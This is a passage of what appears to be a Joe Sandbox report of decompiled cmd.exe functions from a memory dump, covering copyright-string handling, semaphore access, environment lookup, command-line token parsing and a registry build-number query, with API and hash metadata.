                                    																_t291 =  &_v1632;
                                    															}
                                    															_t292 = E011F916C(_t360, _v1660, _v1656, _t291, _t422);
                                    															__eflags =  *0x11fd560;
                                    															_t382 = _v1684;
                                    															if( *0x11fd560 != 0) {
                                    																_t295 = E011E0178(_t292);
                                    																__eflags = _t295;
                                    																if(_t295 != 0) {
                                    																	_t382 = _v1672;
                                    																} else {
                                    																	_t408 = _v1112;
                                    																	__eflags = _v1112;
                                    																	if(__eflags == 0) {
                                    																		_t408 =  &_v1632;
                                    																	}
                                    																	_t296 = E011F84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
                                    																	__eflags = _t296 - _t316;
                                    																	if(_t296 == _t316) {
                                    																		goto L131;
                                    																	}
                                    																	_t382 = _v1668;
                                    																	_v1672 = _v1668;
                                    																}
                                    															}
                                    															_t293 = _v1112;
                                    															__eflags = _t293;
                                    															if(_t293 == 0) {
                                    																_t293 =  &_v1632;
                                    															}
                                    															_t260 = E011D5712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
                                    															__eflags =  *0x11fd5cc;
                                    															if( *0x11fd5cc == 0) {
                                    																_t360 = _v1672;
                                    																continue;
                                    															}
                                    															goto L84;
                                    														}
                                    													} else {
                                    														__eflags = _v1656;
                                    														if(_v1656 > 0) {
                                    															_t297 = _v1112;
                                    															__eflags = _t297;
                                    															if(_t297 == 0) {
                                    																_t297 =  &_v1632;
                                    															}
                                    															_t298 = E011F916C(_t360, _v1660, _v1656, _t297, _t422);
                                    															__eflags =  *0x11fd560;
                                    															_t360 = _v1684;
                                    															if( *0x11fd560 != 0) {
                                    																_t299 = E011E0178(_t298);
                                    																__eflags = _t299;
                                    																if(_t299 != 0) {
                                    																	_t360 = _v1672;
                                    																} else {
                                    																	_t410 = _v1112;
                                    																	__eflags = _v1112;
                                    																	if(__eflags == 0) {
                                    																		_t410 =  &_v1632;
                                    																	}
                                    																	_t300 = E011F84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
                                    																	__eflags = _t300 - _t316;
                                    																	if(_t300 == _t316) {
                                    																		E011DCD27(_v1664);
                                    																		E011DDB92(_t422);
                                    																		_t352 = _v1668;
                                    																		goto L129;
                                    																	}
                                    																	_t360 = _v1668;
                                    																	_v1672 = _v1668;
                                    																}
                                    															}
                                    														}
                                    														__eflags =  *0x11fd5cc;
                                    														if( *0x11fd5cc == 0) {
                                    															goto L69;
                                    														}
                                    													}
                                    													L84:
                                    													__eflags = 0;
                                    													 *0x11fd5cc = 0;
                                    													E011DDB92(_t422);
                                    													_t421 = _v1648;
                                    												} else {
                                    													_t305 = E011F8E52(_t421, _v1660, _v1652);
                                    													_v1680 = _t305;
                                    													_v1676 = _t305;
                                    												}
                                    												_t416 = _t421[8];
                                    												_t263 = 0;
                                    												 *0x11fd564 = 0;
                                    												__eflags = _t416;
                                    												if(_t416 != 0) {
                                    													do {
                                    														_t265 =  *(_t416 + 0x1c);
                                    														__eflags = _t265 & 0x00000004;
                                    														if((_t265 & 0x00000004) != 0) {
                                    															_t290 = _t265 & 0xfffffffb | 0x00000002;
                                    															__eflags = _t290;
                                    															 *(_t416 + 0x1c) = _t290;
                                    														}
                                    														_t363 = _v576;
                                    														__eflags = _v576;
                                    														if(_v576 == 0) {
                                    															_t363 =  &_v1096;
                                    														}
                                    														_t266 = E011D5400(_t363, _v568,  *_t416, _t421[1]);
                                    														__eflags = _t266;
                                    														if(_t266 == 0) {
                                    															_t267 = _v576;
                                    															__eflags = _t267;
                                    															if(_t267 == 0) {
                                    																_t267 =  &_v1096;
                                    															}
                                    															_push(_t267);
                                    															E011E25D9(L"%s\r\n");
                                    														} else {
                                    															_push(0);
                                    															_push(_t266);
                                    															E011DC108(0);
                                    														}
                                    														_t366 = _v576;
                                    														__eflags = _v576;
                                    														if(_v576 == 0) {
                                    															_t366 =  &_v1096;
                                    														}
                                    														_t269 = E011DAD44(_t366);
                                    														__eflags = _t269;
                                    														if(_t269 != 0) {
                                    															_t401 = _v1112;
                                    															__eflags = _v1112;
                                    															if(_v1112 == 0) {
                                    																_t401 =  &_v1632;
                                    															}
                                    															_t367 = _v576;
                                    															__eflags = _v576;
                                    															if(_v576 == 0) {
                                    																_t367 =  &_v1096;
                                    															}
                                    															_t270 = E011F8F66(_t367, _t401);
                                    															__eflags = _t270;
                                    															if(_t270 == 0) {
                                    																_t368 = _v576;
                                    																__eflags = _t368;
                                    																if(_t368 == 0) {
                                    																	_t368 =  &_v1096;
                                    																}
                                    																_t422 = E011D5DB5(_t368, 0, _t368, _t368);
                                    																__eflags = _t422 - 0xffffffff;
                                    																if(_t422 == 0xffffffff) {
                                    																	E011DCD27(_v1664);
                                    																	_t357 = _v1672;
                                    																	goto L134;
                                    																}
                                    																_t273 = E011E0178(_t271);
                                    																__eflags = _t273;
                                    																if(_t273 == 0) {
                                    																	L120:
                                    																	_t371 = _v1652;
                                    																} else {
                                    																	_t371 = 0x80;
                                    																	_v1652 = 0x80;
                                    																}
                                    																__eflags =  *0x11fd5cc;
                                    																if( *0x11fd5cc == 0) {
                                    																	_t274 = _v1112;
                                    																	__eflags = _t274;
                                    																	if(_t274 == 0) {
                                    																		_t274 =  &_v1632;
                                    																	}
                                    																	_t276 = E011D5712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
                                    																	__eflags = _t276;
                                    																	if(_t276 != 0) {
                                    																		_t279 = _v1112;
                                    																		__eflags = _t279;
                                    																		if(_t279 == 0) {
                                    																			_t279 =  &_v1632;
                                    																		}
                                    																		_t280 = E011F916C(_v1672, _v1660, _v1656, _t279, _t422);
                                    																		__eflags =  *0x11fd560;
                                    																		if( *0x11fd560 != 0) {
                                    																			_t281 = E011E0178(_t280);
                                    																			__eflags = _t281;
                                    																			if(_t281 == 0) {
                                    																				_t405 = _v1112;
                                    																				__eflags = _v1112;
                                    																				if(__eflags == 0) {
                                    																					_t405 =  &_v1632;
                                    																				}
                                    																				_t282 = E011F84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
                                    																				__eflags = _t282 - _t316;
                                    																				if(_t282 == _t316) {
                                    																					E011DCD27(_v1664);
                                    																					E011DDB92(_t422);
                                    																					_t352 = _v1668;
                                    																					goto L129;
                                    																				}
                                    																				_v1672 = _v1668;
                                    																			}
                                    																		}
                                    																		goto L120;
                                    																	}
                                    																}
                                    																__eflags = 0;
                                    																 *0x11fd5cc = 0;
                                    																E011DDB92(_t422);
                                    																_t421 = _v1648;
                                    															} else {
                                    																_push(0);
                                    																_push(0x2340);
                                    																E011DC108(_t367);
                                    															}
                                    														}
                                    														_t416 =  *(_t416 + 0x20);
                                    														__eflags = _t416;
                                    													} while (_t416 != 0);
                                    													_t263 = 0;
                                    													__eflags = 0;
                                    												}
                                    												_t413 = _v1672;
                                    												E011D56AE(_t421, _v1640, _v1672, _t263);
                                    											}
                                    											_t391 = _t421[6];
                                    											_t242 = E011E6A1C(E011E6A00, _t421[6], 0x21, _v1664);
                                    											__eflags = _t242;
                                    											if(_t242 != 0) {
                                    												continue;
                                    											} else {
                                    												E011DCD27(_v1664);
                                    												__imp__??_V@YAXPAX@Z(_v576);
                                    												__imp__??_V@YAXPAX@Z(_v40);
                                    												__imp__??_V@YAXPAX@Z(_v1112);
                                    												_t218 = 0;
                                    											}
                                    										}
                                    									}
                                    									goto L142;
                                    								}
                                    								_t214 = E011DCD27(_v1664);
                                    							}
                                    							goto L141;
                                    						}
                                    					}
                                    				}
                                    				L142:
                                    				_pop(_t414);
                                    				_pop(_t420);
                                    				_pop(_t317);
                                    				return E011E6FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
                                    			}

                                    APIs
                                    • longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                    • memset.MSVCRT ref: 011F86B6
                                    • memset.MSVCRT ref: 011F86E4
                                    • memset.MSVCRT ref: 011F8712
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011D585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,011F87AD,?,00000000,-00000105,-00000105,-00000105), ref: 011D5875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$AllocCloseFindVirtuallongjmp
                                    • String ID: %9d
                                    • API String ID: 973120493-2241623522
                                    • Opcode ID: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction ID: 07a11b7b33a58720572a15f09c5808ba03a2de520c30c490bd93c67c36ebebe5
                                    • Opcode Fuzzy Hash: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction Fuzzy Hash: CD51F8B1A087819BD32CDF74D8856AF7BE9EB94318F04092EF689D3240EB74D940CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011F6456(void* __eflags) {
                                    				signed int _v8;
                                    				char _v68;
                                    				void* _v72;
                                    				signed int _v76;
                                    				void* _v80;
                                    				void* _v84;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t21;
                                    				signed int _t28;
                                    				signed int _t30;
                                    				void _t31;
                                    				signed int _t36;
                                    				void* _t38;
                                    				short _t39;
                                    				short _t40;
                                    				signed int _t41;
                                    				signed int _t43;
                                    				signed int _t44;
                                    				void* _t46;
                                    				signed int _t47;
                                    				signed int _t49;
                                    				void* _t53;
                                    				signed int _t56;
                                    				short* _t57;
                                    				signed int _t58;
                                    				void* _t59;
                                    				void* _t60;
                                    				signed int _t61;
                                    				signed int _t65;
                                    				void* _t66;
                                    				signed int _t70;
                                    
                                    				_t21 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t21 ^ _t70;
                                    				_t49 = 0xe;
                                    				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
                                    				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
                                    				asm("movsw");
                                    				_t65 = 0;
                                    				_t47 = 0;
                                    				if(E011E7735(0) == 0) {
                                    					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
                                    						goto L26;
                                    					} else {
                                    						_t67 = _v80;
                                    						_v72 = _t67;
                                    						goto L4;
                                    					}
                                    				} else {
                                    					_t46 =  *0x121c000(L"%WINDOWS_COPYRIGHT%");
                                    					_t67 = _t46;
                                    					_v72 = _t46;
                                    					L4:
                                    					if(_t67 == 0) {
                                    						L26:
                                    						_t28 = 0;
                                    					} else {
                                    						_t30 =  *_t67 & 0x0000ffff;
                                    						_t60 = _t67;
                                    						if(_t30 != 0) {
                                    							_t58 = _t30;
                                    							do {
                                    								if(_t58 == 0xae || _t58 == 0xa9) {
                                    									_t43 = 1;
                                    								} else {
                                    									_t43 = _t65;
                                    								}
                                    								_t60 = _t60 + 2;
                                    								_t47 = _t47 + _t43;
                                    								_t44 =  *_t60 & 0x0000ffff;
                                    								_t58 = _t44;
                                    							} while (_t44 != 0);
                                    							_t67 = _v72;
                                    						}
                                    						_t53 = _t67;
                                    						_t59 = _t53 + 2;
                                    						do {
                                    							_t31 =  *_t53;
                                    							_t53 = _t53 + 2;
                                    						} while (_t31 != _t65);
                                    						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
                                    						_v76 = _t47;
                                    						if(_t47 != 0) {
                                    							_t36 =  *_t67 & 0x0000ffff;
                                    							_t66 = _t67;
                                    							_t56 = _t47;
                                    							if(_t36 != 0) {
                                    								_t61 = _t36;
                                    								do {
                                    									if(_t61 == 0xae || _t61 == 0xa9) {
                                    										_t38 = 0x28;
                                    										 *_t56 = _t38;
                                    										_t39 = 0x63;
                                    										 *((short*)(_t56 + 2)) = _t39;
                                    										_t57 = _t56 + 4;
                                    										_t40 = 0x29;
                                    										 *_t57 = _t40;
                                    									} else {
                                    										 *_t56 = _t61;
                                    									}
                                    									_t66 = _t66 + 2;
                                    									_t56 = _t57 + 2;
                                    									_t41 =  *_t66 & 0x0000ffff;
                                    									_t61 = _t41;
                                    								} while (_t41 != 0);
                                    								_t67 = _v72;
                                    								_t47 = _v76;
                                    							}
                                    							_t65 = _t47;
                                    							 *_t56 = 0;
                                    						}
                                    						GlobalFree(_t67);
                                    						_t28 = _t65;
                                    					}
                                    				}
                                    				return E011E6FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
                                    			}

                                    APIs
                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 011F64A1
                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 011F6517
                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011F657F
                                    Strings
                                    • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 011F646E
                                    • %WINDOWS_COPYRIGHT%, xrefs: 011F6487
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                    • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                    • API String ID: 1103618819-4062316587
                                    • Opcode ID: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                    • Instruction ID: 6b238cb15df7aefa38a59d2d1356d3b57867e851cb587cb24cbcd8520b147d85
                                    • Opcode Fuzzy Hash: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                    • Instruction Fuzzy Hash: D2412335A002158BDF28DFA898587BA77B2EF48740B59006DEB06EB354EB659D43C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E011F2BF0(void* __ecx, int* _a4) {
                                    				void* _v0;
                                    				signed int _v8;
                                    				short _v528;
                                    				void* _v532;
                                    				int _v536;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t22;
                                    				short* _t25;
                                    				void* _t30;
                                    				void* _t38;
                                    				WCHAR* _t40;
                                    				int* _t41;
                                    				void* _t46;
                                    				void* _t50;
                                    				signed int _t52;
                                    				signed int _t55;
                                    				void* _t57;
                                    				void* _t58;
                                    				signed int _t59;
                                    
                                    				_t22 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t22 ^ _t59;
                                    				_t41 = _a4;
                                    				 *_t41 = 0;
                                    				_t41[1] = 0;
                                    				E011E1040( &_v528, 0x104, __ecx);
                                    				_t52 = 0x104;
                                    				_t25 =  &_v528;
                                    				while( *_t25 != 0) {
                                    					_t25 = _t25 + 2;
                                    					_t52 = _t52 - 1;
                                    					if(_t52 != 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				asm("sbb ecx, ecx");
                                    				_t46 =  ~_t52 & 0x00000104 - _t52;
                                    				if(_t52 != 0) {
                                    					_t40 =  &(( &_v528)[_t46]);
                                    					_t58 = 0x104 - _t46;
                                    					if(_t58 == 0) {
                                    						L11:
                                    						_t40 = _t40 - 2;
                                    					} else {
                                    						_t50 = 0x7ffffffe;
                                    						_t52 = L"_p0" - _t40;
                                    						while(_t50 != 0) {
                                    							_t55 =  *(_t40 + _t52) & 0x0000ffff;
                                    							if(_t55 == 0) {
                                    								break;
                                    							} else {
                                    								 *_t40 = _t55;
                                    								_t50 = _t50 - 1;
                                    								_t40 =  &(_t40[1]);
                                    								_t58 = _t58 - 1;
                                    								if(_t58 != 0) {
                                    									continue;
                                    								} else {
                                    									goto L11;
                                    								}
                                    							}
                                    							goto L12;
                                    						}
                                    						if(_t58 == 0) {
                                    							goto L11;
                                    						}
                                    					}
                                    					L12:
                                    					_t46 = 0;
                                    					 *_t40 = 0;
                                    				}
                                    				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
                                    				_v532 = _t57;
                                    				if(_t57 != 0) {
                                    					_t52 =  &_v536;
                                    					_v536 = 0;
                                    					_t46 = _t57;
                                    					_t30 = E011F213A(_t46, _t52);
                                    					_t54 = _t30;
                                    					if(_t30 >= 0) {
                                    						asm("cdq");
                                    						 *_t41 = _v536;
                                    						_t41[1] = _t52;
                                    						goto L19;
                                    					} else {
                                    						_t46 = _v0;
                                    						_t52 = 0xce;
                                    						E011F292C("wil", _t54);
                                    						_t57 = _v532;
                                    					}
                                    				} else {
                                    					if(GetLastError() == 2) {
                                    						L19:
                                    						_t54 = 0;
                                    					} else {
                                    						_t46 = _v0;
                                    						_t52 = 0xc8;
                                    						_t38 = E011F2913("wil");
                                    						_t57 = _v532;
                                    						_t54 = _t38;
                                    					}
                                    				}
                                    				if(_t57 != 0 && CloseHandle(_t57) == 0) {
                                    					_push(_t46);
                                    					_t52 = 0x879;
                                    					E011F2D56();
                                    				}
                                    				return E011E6FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
                                    			}

                                    APIs
                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 011F2CA5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F2CB7
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011F2D29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastOpenSemaphore
                                    • String ID: _p0$wil
                                    • API String ID: 3419097560-1814513734
                                    • Opcode ID: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction ID: 5ef3c9a16b988b78459f583e3ef312d357a3e061fc114252ff7629f96343635a
                                    • Opcode Fuzzy Hash: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction Fuzzy Hash: 7D411971A001298BDB3DDF68C958BEA37B5EB94710F1582ACDA09DB284DB70CD45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 74%
                                    			E011F4588(intOrPtr __ecx) {
                                    				intOrPtr _v8;
                                    				intOrPtr* _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				short* _t23;
                                    				intOrPtr _t24;
                                    				intOrPtr _t25;
                                    				intOrPtr* _t33;
                                    				void* _t38;
                                    				intOrPtr _t41;
                                    				void* _t47;
                                    				void* _t49;
                                    				intOrPtr* _t50;
                                    				signed int _t52;
                                    				intOrPtr* _t53;
                                    				intOrPtr* _t54;
                                    				signed int _t55;
                                    				signed int _t56;
                                    				intOrPtr* _t57;
                                    				signed int _t58;
                                    				void* _t59;
                                    
                                    				_t33 =  *0x1203834;
                                    				_v20 = __ecx;
                                    				if(_t33 != 0) {
                                    					_t53 = E011DDF40(E011DDEF9(__ecx));
                                    					_v12 = _t53;
                                    					if(_t53 == 0) {
                                    						L2:
                                    						return 1;
                                    					}
                                    					_t47 = 0x20;
                                    					_t23 = E011E2349(_t53, _t47);
                                    					if(_t23 != 0) {
                                    						 *_t23 = 0;
                                    					}
                                    					_t50 = _t53;
                                    					_v16 = 0;
                                    					_t4 = _t50 + 2; // 0x2
                                    					_t38 = _t4;
                                    					do {
                                    						_t24 =  *_t50;
                                    						_t50 = _t50 + 2;
                                    					} while (_t24 != 0);
                                    					_t54 = _t33;
                                    					_t52 = _t50 - _t38 >> 1;
                                    					_v8 = 1;
                                    					_t41 = _t54 + 2;
                                    					do {
                                    						_t25 =  *_t54;
                                    						_t54 = _t54 + 2;
                                    					} while (_t25 != 0);
                                    					_t55 = _t54 - _t41;
                                    					_t56 = _t55 >> 1;
                                    					if(_t55 == 0) {
                                    						L22:
                                    						E011DC5A2(_t41, 0x400023a9, 1, _v20);
                                    						L23:
                                    						E011E0040(_v12);
                                    						return _v8;
                                    					}
                                    					while( *0x11fd544 == 0) {
                                    						if(_t56 < _t52) {
                                    							L15:
                                    							_t41 = _v8;
                                    							L16:
                                    							_t33 = _t33 + _t56 * 2 + 2;
                                    							_t57 = _t33;
                                    							_t49 = _t57 + 2;
                                    							do {
                                    								_t25 =  *_t57;
                                    								_t57 = _t57 + 2;
                                    							} while (_t25 != _v16);
                                    							_t58 = _t57 - _t49;
                                    							_t56 = _t58 >> 1;
                                    							if(_t58 != 0) {
                                    								continue;
                                    							}
                                    							L21:
                                    							if(_t41 == 0) {
                                    								goto L23;
                                    							}
                                    							goto L22;
                                    						}
                                    						__imp___wcsnicmp(_t33, _v12, _t52);
                                    						_t59 = _t59 + 0xc;
                                    						if(_t25 != 0) {
                                    							goto L15;
                                    						}
                                    						_push(_t33);
                                    						E011E25D9(L"%s\r\n");
                                    						_t41 = 0;
                                    						_v8 = 0;
                                    						goto L16;
                                    					}
                                    					_t41 = _v8;
                                    					goto L21;
                                    				}
                                    				_push("Null environment");
                                    				fprintf(E011E7721(__ecx, 2), "\nCMD Internal Error %s\n");
                                    				goto L2;
                                    			}

























                                    APIs
                                    • _wcsnicmp.MSVCRT ref: 011F4635
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F45B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __iob_func_wcsnicmpfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 1828771275-2781220306
                                    • Opcode ID: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction ID: 5ff6aa4390d4c47a6fd76ce5ab5c55080b935e425ef280e3173e00a2876c3549
                                    • Opcode Fuzzy Hash: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction Fuzzy Hash: 90315D36E00211DBCF3CEFAC98496AFB7A4EF94614F05056DEE1AA3A40EB705E01C785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E011D68D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				signed int _t16;
                                    				signed int _t19;
                                    				signed int _t21;
                                    				intOrPtr _t24;
                                    				signed int _t38;
                                    				long _t40;
                                    				signed short* _t44;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v12 = __edx;
                                    				_t44 = E011DDEF9(__ecx);
                                    				_t16 =  *_t44 & 0x0000ffff;
                                    				if(_t16 != 0x3a) {
                                    					if(_t16 != 0x2b) {
                                    						goto L2;
                                    					} else {
                                    						goto L1;
                                    					}
                                    					L10:
                                    					_t19 = _v8;
                                    					 *((short*)(_v12 + _t19 * 2)) = 0;
                                    					return _t19;
                                    					L17:
                                    				} else {
                                    					L1:
                                    					_t44 =  &(_t44[1]);
                                    				}
                                    				L2:
                                    				_t24 = _a8;
                                    				if(_t24 == 0) {
                                    					_t44 = E011DDEF9(_t44);
                                    				}
                                    				_v8 = _v8 & 0x00000000;
                                    				_t40 =  *_t44 & 0x0000ffff;
                                    				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
                                    					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
                                    						if(_t24 == 0) {
                                    							if(E011DD7D4(L"&<|>", _t40) == 0) {
                                    								if(_t40 != 0x5e) {
                                    									goto L8;
                                    								} else {
                                    									_t44 =  &(_t44[1]);
                                    									_t38 =  *_t44 & 0x0000ffff;
                                    									goto L9;
                                    								}
                                    								goto L17;
                                    							}
                                    						} else {
                                    							L8:
                                    							_t38 = _t40 & 0x0000ffff;
                                    							L9:
                                    							_t32 = _v8;
                                    							_t44 =  &(_t44[1]);
                                    							_t7 = _t32 + 1; // 0x1
                                    							_t21 = _t7;
                                    							 *(_v12 + _v8 * 2) = _t38;
                                    							_t40 =  *_t44 & 0x0000ffff;
                                    							_v8 = _t21;
                                    							if(_t21 < 0x7f) {
                                    								continue;
                                    							}
                                    						}
                                    					}
                                    					goto L10;
                                    				}
                                    				goto L10;
                                    			}













                                    APIs
                                      • Part of subcall function 011DDEF9: iswspace.MSVCRT ref: 011DDF07
                                      • Part of subcall function 011DDEF9: wcschr.MSVCRT ref: 011DDF18
                                    • wcschr.MSVCRT ref: 011D6914
                                    • wcschr.MSVCRT ref: 011D6926
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID: &<|>$+: $=,;
                                    • API String ID: 3458554142-2256444845
                                    • Opcode ID: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction ID: a9fe4d00383210e98b869d9fe7eb476e0939fec3fc86c21e78e800352c0d37be
                                    • Opcode Fuzzy Hash: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction Fuzzy Hash: F5213672A44266EECB3C8B6AD4146BEB7E6EFA5624B25406EE9C4D7281FB315C40C350
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011D4476() {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				char _v20;
                                    				long _t17;
                                    				int _t20;
                                    
                                    				_t20 = 4;
                                    				_v16 = _t20;
                                    				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
                                    					L5:
                                    					return 0;
                                    				}
                                    				_v12 = _t20;
                                    				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
                                    				RegCloseKey(_v8);
                                    				if(_t17 != 0 || _v12 != _t20) {
                                    					goto L5;
                                    				} else {
                                    					return _v20;
                                    				}
                                    			}










                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,011F731D,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D449A
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,UBR,00000000,?,?,011D444F,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44BE
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44C9
                                    Strings
                                    • UBR, xrefs: 011D44B6
                                    • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 011D4490
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                    • API String ID: 3677997916-3870813718
                                    • Opcode ID: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction ID: cf61cfdaed9bdab0fba005ebbc4d1a8afd27dee39561569764b46a22f792f7b7
                                    • Opcode Fuzzy Hash: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction Fuzzy Hash: 2D011D76A80218BBDF32DA95EC49FEEBBBCEB84710F140166E901A2541D7705A90DB50
